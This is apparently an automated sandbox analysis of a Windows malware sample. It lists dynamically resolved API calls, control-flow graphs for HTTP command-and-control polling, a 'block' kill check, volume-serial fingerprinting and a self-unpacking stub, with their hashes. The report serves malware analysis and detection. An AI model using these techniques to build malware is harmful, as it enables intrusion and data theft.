                                      • GetProcAddress.KERNEL32(74DD0000,009D3A18), ref: 00419CF0
                                      • GetProcAddress.KERNEL32(74DD0000,009D3A30), ref: 00419D08
                                      • GetProcAddress.KERNEL32(74DD0000,009D3A00), ref: 00419D20
                                      • GetProcAddress.KERNEL32(74DD0000,009A3B58), ref: 00419D39
                                      • GetProcAddress.KERNEL32(74DD0000,009A3D18), ref: 00419D51
                                      • GetProcAddress.KERNEL32(74DD0000,009A3B98), ref: 00419D69
                                      • GetProcAddress.KERNEL32(74DD0000,009A3BB8), ref: 00419D82
                                      • GetProcAddress.KERNEL32(74DD0000,009DA558), ref: 00419D9A
                                      • GetProcAddress.KERNEL32(74DD0000,009DA4C8), ref: 00419DB2
                                      • GetProcAddress.KERNEL32(74DD0000,009D7450), ref: 00419DCB
                                      • GetProcAddress.KERNEL32(74DD0000,009A3BF8), ref: 00419DE3
                                      • GetProcAddress.KERNEL32(74DD0000,009DA570), ref: 00419DFB
                                      • GetProcAddress.KERNEL32(74DD0000,009DA5E8), ref: 00419E14
                                      • GetProcAddress.KERNEL32(74DD0000,009DA648), ref: 00419E2C
                                      • GetProcAddress.KERNEL32(74DD0000,009DA5B8), ref: 00419E44
                                      • GetProcAddress.KERNEL32(74DD0000,009A3C18), ref: 00419E5D
                                      • GetProcAddress.KERNEL32(74DD0000,009DA630), ref: 00419E75
                                      • GetProcAddress.KERNEL32(74DD0000,009DA4B0), ref: 00419E8D
                                      • GetProcAddress.KERNEL32(74DD0000,009DA3D8), ref: 00419EA6
                                      • GetProcAddress.KERNEL32(74DD0000,009DA4E0), ref: 00419EBE
                                      • GetProcAddress.KERNEL32(74DD0000,009DA468), ref: 00419ED6
                                      • GetProcAddress.KERNEL32(74DD0000,009DA618), ref: 00419EEF
                                      • GetProcAddress.KERNEL32(74DD0000,009DA660), ref: 00419F07
                                      • GetProcAddress.KERNEL32(74DD0000,009DA498), ref: 00419F1F
                                      • GetProcAddress.KERNEL32(74DD0000,009DA678), ref: 00419F38
                                      • GetProcAddress.KERNEL32(74DD0000,009D65D8), ref: 00419F50
                                      • GetProcAddress.KERNEL32(74DD0000,009DA4F8), ref: 00419F68
                                      • GetProcAddress.KERNEL32(74DD0000,009DA510), ref: 00419F81
                                      • GetProcAddress.KERNEL32(74DD0000,009A3C38), ref: 00419F99
                                      • GetProcAddress.KERNEL32(74DD0000,009DA3F0), ref: 00419FB1
                                      • GetProcAddress.KERNEL32(74DD0000,009A3C58), ref: 00419FCA
                                      • GetProcAddress.KERNEL32(74DD0000,009DA390), ref: 00419FE2
                                      • GetProcAddress.KERNEL32(74DD0000,009DA3A8), ref: 00419FFA
                                      • GetProcAddress.KERNEL32(74DD0000,009A3838), ref: 0041A013
                                      • GetProcAddress.KERNEL32(74DD0000,009A3778), ref: 0041A02B
                                      • LoadLibraryA.KERNEL32(009DA5A0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                                      • LoadLibraryA.KERNEL32(009DA528,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                                      • LoadLibraryA.KERNEL32(009DA438,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                                      • LoadLibraryA.KERNEL32(009DA3C0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                                      • LoadLibraryA.KERNEL32(009DA420,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                                      • LoadLibraryA.KERNEL32(009DA540,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                                      • LoadLibraryA.KERNEL32(009DA600,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                                      • LoadLibraryA.KERNEL32(009DA408,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                                      • GetProcAddress.KERNEL32(75290000,009A37D8), ref: 0041A0DA
                                      • GetProcAddress.KERNEL32(75290000,009DA480), ref: 0041A0F2
                                      • GetProcAddress.KERNEL32(75290000,009A9650), ref: 0041A10A
                                      • GetProcAddress.KERNEL32(75290000,009DA450), ref: 0041A123
                                      • GetProcAddress.KERNEL32(75290000,009A3758), ref: 0041A13B
                                      • GetProcAddress.KERNEL32(6FC70000,009D71D0), ref: 0041A160
                                      • GetProcAddress.KERNEL32(6FC70000,009A3A98), ref: 0041A179
                                      • GetProcAddress.KERNEL32(6FC70000,009D6ED8), ref: 0041A191
                                      • GetProcAddress.KERNEL32(6FC70000,009DA588), ref: 0041A1A9
                                      • GetProcAddress.KERNEL32(6FC70000,009DA5D0), ref: 0041A1C2
                                      • GetProcAddress.KERNEL32(6FC70000,009A39F8), ref: 0041A1DA
                                      • GetProcAddress.KERNEL32(6FC70000,009A3938), ref: 0041A1F2
                                      • GetProcAddress.KERNEL32(6FC70000,009DA6D8), ref: 0041A20B
                                      • GetProcAddress.KERNEL32(752C0000,009A3958), ref: 0041A22C
                                      • GetProcAddress.KERNEL32(752C0000,009A37F8), ref: 0041A244
                                      • GetProcAddress.KERNEL32(752C0000,009DA6F0), ref: 0041A25D
                                      • GetProcAddress.KERNEL32(752C0000,009DA708), ref: 0041A275
                                      • GetProcAddress.KERNEL32(752C0000,009A3798), ref: 0041A28D
                                      • GetProcAddress.KERNEL32(74EC0000,009D6EB0), ref: 0041A2B3
                                      • GetProcAddress.KERNEL32(74EC0000,009D70E0), ref: 0041A2CB
                                      • GetProcAddress.KERNEL32(74EC0000,009DA6C0), ref: 0041A2E3
                                      • GetProcAddress.KERNEL32(74EC0000,009A39D8), ref: 0041A2FC
                                      • GetProcAddress.KERNEL32(74EC0000,009A3818), ref: 0041A314
                                      • GetProcAddress.KERNEL32(74EC0000,009D6F00), ref: 0041A32C
                                      • GetProcAddress.KERNEL32(75BD0000,009DA750), ref: 0041A352
                                      • GetProcAddress.KERNEL32(75BD0000,009A3978), ref: 0041A36A
                                      • GetProcAddress.KERNEL32(75BD0000,009A9670), ref: 0041A382
                                      • GetProcAddress.KERNEL32(75BD0000,009DA690), ref: 0041A39B
                                      • GetProcAddress.KERNEL32(75BD0000,009DA720), ref: 0041A3B3
                                      • GetProcAddress.KERNEL32(75BD0000,009A3A18), ref: 0041A3CB
                                      • GetProcAddress.KERNEL32(75BD0000,009A36D8), ref: 0041A3E4
                                      • GetProcAddress.KERNEL32(75BD0000,009DA738), ref: 0041A3FC
                                      • GetProcAddress.KERNEL32(75BD0000,009DA6A8), ref: 0041A414
                                      • GetProcAddress.KERNEL32(75A70000,009A37B8), ref: 0041A436
                                      • GetProcAddress.KERNEL32(75A70000,009DB078), ref: 0041A44E
                                      • GetProcAddress.KERNEL32(75A70000,009DB090), ref: 0041A466
                                      • GetProcAddress.KERNEL32(75A70000,009DAEB0), ref: 0041A47F
                                      • GetProcAddress.KERNEL32(75A70000,009DB000), ref: 0041A497
                                      • GetProcAddress.KERNEL32(75450000,009A38F8), ref: 0041A4B8
                                      • GetProcAddress.KERNEL32(75450000,009A3858), ref: 0041A4D1
                                      • GetProcAddress.KERNEL32(75DA0000,009A36F8), ref: 0041A4F2
                                      • GetProcAddress.KERNEL32(75DA0000,009DAE98), ref: 0041A50A
                                      • GetProcAddress.KERNEL32(6F070000,009A3A38), ref: 0041A530
                                      • GetProcAddress.KERNEL32(6F070000,009A3A58), ref: 0041A548
                                      • GetProcAddress.KERNEL32(6F070000,009A3918), ref: 0041A560
                                      • GetProcAddress.KERNEL32(6F070000,009DB0A8), ref: 0041A579
                                      • GetProcAddress.KERNEL32(6F070000,009A3878), ref: 0041A591
                                      • GetProcAddress.KERNEL32(6F070000,009A3898), ref: 0041A5A9
                                      • GetProcAddress.KERNEL32(6F070000,009A38B8), ref: 0041A5C2
                                      • GetProcAddress.KERNEL32(6F070000,009A38D8), ref: 0041A5DA
                                      • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0041A5F1
                                      • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0041A607
                                      • GetProcAddress.KERNEL32(75AF0000,009DAFB8), ref: 0041A629
                                      • GetProcAddress.KERNEL32(75AF0000,009A9590), ref: 0041A641
                                      • GetProcAddress.KERNEL32(75AF0000,009DB0C0), ref: 0041A659
                                      • GetProcAddress.KERNEL32(75AF0000,009DB060), ref: 0041A672
                                      • GetProcAddress.KERNEL32(75D90000,009A3998), ref: 0041A693
                                      • GetProcAddress.KERNEL32(6D120000,009DB168), ref: 0041A6B4
                                      • GetProcAddress.KERNEL32(6D120000,009A39B8), ref: 0041A6CD
                                      • GetProcAddress.KERNEL32(6D120000,009DAEC8), ref: 0041A6E5
                                      • GetProcAddress.KERNEL32(6D120000,009DB018), ref: 0041A6FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: HttpQueryInfoA$InternetSetOptionA
                                      • API String ID: 2238633743-1775429166
                                      • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                      • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                                      • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                      • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1001 406280-40630b call 41a7a0 call 4047b0 call 41a740 InternetOpenA StrCmpCA 1008 406314-406318 1001->1008 1009 40630d 1001->1009 1010 406509-406525 call 41a7a0 call 41a800 * 2 1008->1010 1011 40631e-406342 InternetConnectA 1008->1011 1009->1008 1030 406528-40652d 1010->1030 1013 406348-40634c 1011->1013 1014 4064ff-406503 InternetCloseHandle 1011->1014 1016 40635a 1013->1016 1017 40634e-406358 1013->1017 1014->1010 1018 406364-406392 HttpOpenRequestA 1016->1018 1017->1018 1020 4064f5-4064f9 InternetCloseHandle 1018->1020 1021 406398-40639c 1018->1021 1020->1014 1023 4063c5-406405 HttpSendRequestA HttpQueryInfoA 1021->1023 1024 40639e-4063bf InternetSetOptionA 1021->1024 1026 406407-406427 call 41a740 call 41a800 * 2 1023->1026 1027 40642c-40644b call 418940 1023->1027 1024->1023 1026->1030 1035 4064c9-4064e9 call 41a740 call 41a800 * 2 1027->1035 1036 40644d-406454 1027->1036 1035->1030 1037 406456-406480 InternetReadFile 1036->1037 1038 4064c7-4064ef InternetCloseHandle 1036->1038 1041 406482-406489 1037->1041 1042 40648b 1037->1042 1038->1020 1041->1042 1046 40648d-4064c5 call 41a9b0 call 41a8a0 call 41a800 1041->1046 1042->1038 1046->1037
                                      APIs
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                        • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                        • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                      • StrCmpCA.SHLWAPI(?,009DC7A8), ref: 00406303
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                      • HttpOpenRequestA.WININET(00000000,GET,?,009DC178,00000000,00000000,00400100,00000000), ref: 00406385
                                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                      • InternetCloseHandle.WININET(00000000), ref: 004064EF
                                      • InternetCloseHandle.WININET(00000000), ref: 004064F9
                                      • InternetCloseHandle.WININET(00000000), ref: 00406503
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                      • String ID: ERROR$ERROR$GET
                                      • API String ID: 3074848878-2509457195
                                      • Opcode ID: c8a6f04fdac549dd7e3b25e171be04d87dad98b8dac672af1d85c5c8f489a90f
                                      • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                                      • Opcode Fuzzy Hash: c8a6f04fdac549dd7e3b25e171be04d87dad98b8dac672af1d85c5c8f489a90f
                                      • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1058 4117a0-4117cd call 41aad0 StrCmpCA 1061 4117d7-4117f1 call 41aad0 strtok_s 1058->1061 1062 4117cf-4117d1 ExitProcess 1058->1062 1065 4117f4-4117f8 1061->1065 1066 4119c2-4119cd call 41a800 1065->1066 1067 4117fe-411811 1065->1067 1069 411817-41181a 1067->1069 1070 41199e-4119bd strtok_s 1067->1070 1072 411821-411830 call 41a820 1069->1072 1073 411849-411858 call 41a820 1069->1073 1074 4118ad-4118be StrCmpCA 1069->1074 1075 4118cf-4118e0 StrCmpCA 1069->1075 1076 41198f-411999 call 41a820 1069->1076 1077 4118f1-411902 StrCmpCA 1069->1077 1078 411951-411962 StrCmpCA 1069->1078 1079 411970-411981 StrCmpCA 1069->1079 1080 411913-411924 StrCmpCA 1069->1080 1081 411932-411943 StrCmpCA 1069->1081 1082 411835-411844 call 41a820 1069->1082 1083 41185d-41186e StrCmpCA 1069->1083 1084 41187f-411890 StrCmpCA 1069->1084 1070->1065 1072->1070 1073->1070 1095 4118c0-4118c3 1074->1095 1096 4118ca 1074->1096 1097 4118e2-4118e5 1075->1097 1098 4118ec 1075->1098 1076->1070 1099 411904-411907 1077->1099 1100 41190e 1077->1100 1105 411964-411967 1078->1105 1106 41196e 1078->1106 1086 411983-411986 1079->1086 1087 41198d 1079->1087 1101 411930 1080->1101 1102 411926-411929 1080->1102 1103 411945-411948 1081->1103 1104 41194f 1081->1104 1082->1070 1091 411870-411873 1083->1091 1092 41187a 1083->1092 1093 411892-41189c 1084->1093 1094 41189e-4118a1 1084->1094 1086->1087 1087->1070 1091->1092 1092->1070 1110 4118a8 1093->1110 1094->1110 1095->1096 1096->1070 1097->1098 1098->1070 1099->1100 1100->1070 1101->1070 1102->1101 1103->1104 1104->1070 1105->1106 1106->1070 1110->1070
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcessstrtok_s
                                      • String ID: block
                                      • API String ID: 3407564107-2199623458
                                      • Opcode ID: b3dd8198764fe9467e4b2c8b9506a85e5c70b97dc7c09ae6ead8ebf8a0dcb198
                                      • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                                      • Opcode Fuzzy Hash: b3dd8198764fe9467e4b2c8b9506a85e5c70b97dc7c09ae6ead8ebf8a0dcb198
                                      • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1111 415510-415577 call 415ad0 call 41a820 * 3 call 41a740 * 4 1127 41557c-415583 1111->1127 1128 415585-4155b6 call 41a820 call 41a7a0 call 401590 call 4151f0 1127->1128 1129 4155d7-41564c call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1127->1129 1145 4155bb-4155d2 call 41a8a0 call 41a800 1128->1145 1155 415693-4156a9 call 41aad0 StrCmpCA 1129->1155 1159 41564e-41568e call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1129->1159 1145->1155 1160 4157dc-415844 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1155->1160 1161 4156af-4156b6 1155->1161 1159->1155 1291 415ac3-415ac6 1160->1291 1165 4157da-41585f call 41aad0 StrCmpCA 1161->1165 1166 4156bc-4156c3 1161->1166 1185 415991-4159f9 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1165->1185 1186 415865-41586c 1165->1186 1170 4156c5-415719 call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1166->1170 1171 41571e-415793 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1166->1171 1170->1165 1171->1165 1271 415795-4157d5 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1171->1271 1185->1291 1192 415872-415879 1186->1192 1193 41598f-415a14 call 41aad0 StrCmpCA 1186->1193 1200 4158d3-415948 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1192->1200 1201 41587b-4158ce call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1192->1201 1222 415a16-415a21 Sleep 1193->1222 1223 415a28-415a91 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1193->1223 1200->1193 1296 41594a-41598a call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1200->1296 1201->1193 1222->1127 1223->1291 1271->1165 1296->1193
                                      APIs
                                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,009A94C0,?,0042110C,?,00000000), ref: 0041A82B
                                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                        • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                                        • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                        • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                                        • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                                        • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                                      • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$Sleepstrtok
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 3630751533-2791005934
                                      • Opcode ID: 497b44604cdb86425a2f1df15548df3ba7e7c57ddf51101f201cba8e249eba1a
                                      • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                                      • Opcode Fuzzy Hash: 497b44604cdb86425a2f1df15548df3ba7e7c57ddf51101f201cba8e249eba1a
                                      • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1322 417500-41754a GetWindowsDirectoryA 1323 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1322->1323 1324 41754c 1322->1324 1331 4175d8-4175df 1323->1331 1324->1323 1332 4175e1-4175fa call 418d00 1331->1332 1333 4175fc-417617 GetProcessHeap HeapAlloc 1331->1333 1332->1331 1335 417619-417626 call 41a740 1333->1335 1336 417628-417658 wsprintfA call 41a740 1333->1336 1343 41767e-41768e 1335->1343 1336->1343
                                      APIs
                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                                      • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                                      • wsprintfA.USER32 ref: 00417640
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                      • String ID: :$C$\
                                      • API String ID: 3790021787-3809124531
                                      • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                      • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                      • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                      • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1344 91003c-910047 1345 910049 1344->1345 1346 91004c-910263 call 910a3f call 910e0f call 910d90 VirtualAlloc 1344->1346 1345->1346 1361 910265-910289 call 910a69 1346->1361 1362 91028b-910292 1346->1362 1367 9102ce-9103c2 VirtualProtect call 910cce call 910ce7 1361->1367 1364 9102a1-9102b0 1362->1364 1366 9102b2-9102cc 1364->1366 1364->1367 1366->1364 1373 9103d1-9103e0 1367->1373 1374 9103e2-910437 call 910ce7 1373->1374 1375 910439-9104b8 VirtualFree 1373->1375 1374->1373 1377 9105f4-9105fe 1375->1377 1378 9104be-9104cd 1375->1378 1381 910604-91060d 1377->1381 1382 91077f-910789 1377->1382 1380 9104d3-9104dd 1378->1380 1380->1377 1386 9104e3-910505 LoadLibraryA 1380->1386 1381->1382 1387 910613-910637 1381->1387 1384 9107a6-9107b0 1382->1384 1385 91078b-9107a3 1382->1385 1388 9107b6-9107cb 1384->1388 1389 91086e-9108be LoadLibraryA 1384->1389 1385->1384 1390 910517-910520 1386->1390 1391 910507-910515 1386->1391 1392 91063e-910648 1387->1392 1393 9107d2-9107d5 1388->1393 1396 9108c7-9108f9 1389->1396 1394 910526-910547 1390->1394 1391->1394 1392->1382 1395 91064e-91065a 1392->1395 1397 910824-910833 1393->1397 1398 9107d7-9107e0 1393->1398 1399 91054d-910550 1394->1399 1395->1382 1400 910660-91066a 1395->1400 1403 910902-91091d 1396->1403 1404 9108fb-910901 1396->1404 1402 910839-91083c 1397->1402 1405 9107e2 1398->1405 1406 9107e4-910822 1398->1406 1407 9105e0-9105ef 1399->1407 1408 910556-91056b 1399->1408 1401 91067a-910689 1400->1401 1411 910750-91077a 1401->1411 1412 91068f-9106b2 1401->1412 1402->1389 1413 91083e-910847 1402->1413 1404->1403 1405->1397 1406->1393 1407->1380 1409 91056d 1408->1409 1410 91056f-91057a 1408->1410 1409->1407 1414 91059b-9105bb 1410->1414 1415 91057c-910599 1410->1415 1411->1392 1416 9106b4-9106ed 1412->1416 1417 9106ef-9106fc 1412->1417 1418 910849 1413->1418 1419 91084b-91086c 1413->1419 1427 9105bd-9105db 1414->1427 1415->1427 1416->1417 1421 91074b 1417->1421 1422 9106fe-910748 1417->1422 1418->1389 1419->1402 1421->1401 1422->1421 1427->1399
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0091024D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID: cess$kernel32.dll
                                      • API String ID: 4275171209-1230238691
                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                      • Instruction ID: f9d09aedfadddf6785d1a2a1ba0e39111bf1b4f7a53faa66e4465624c837c3fe
                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
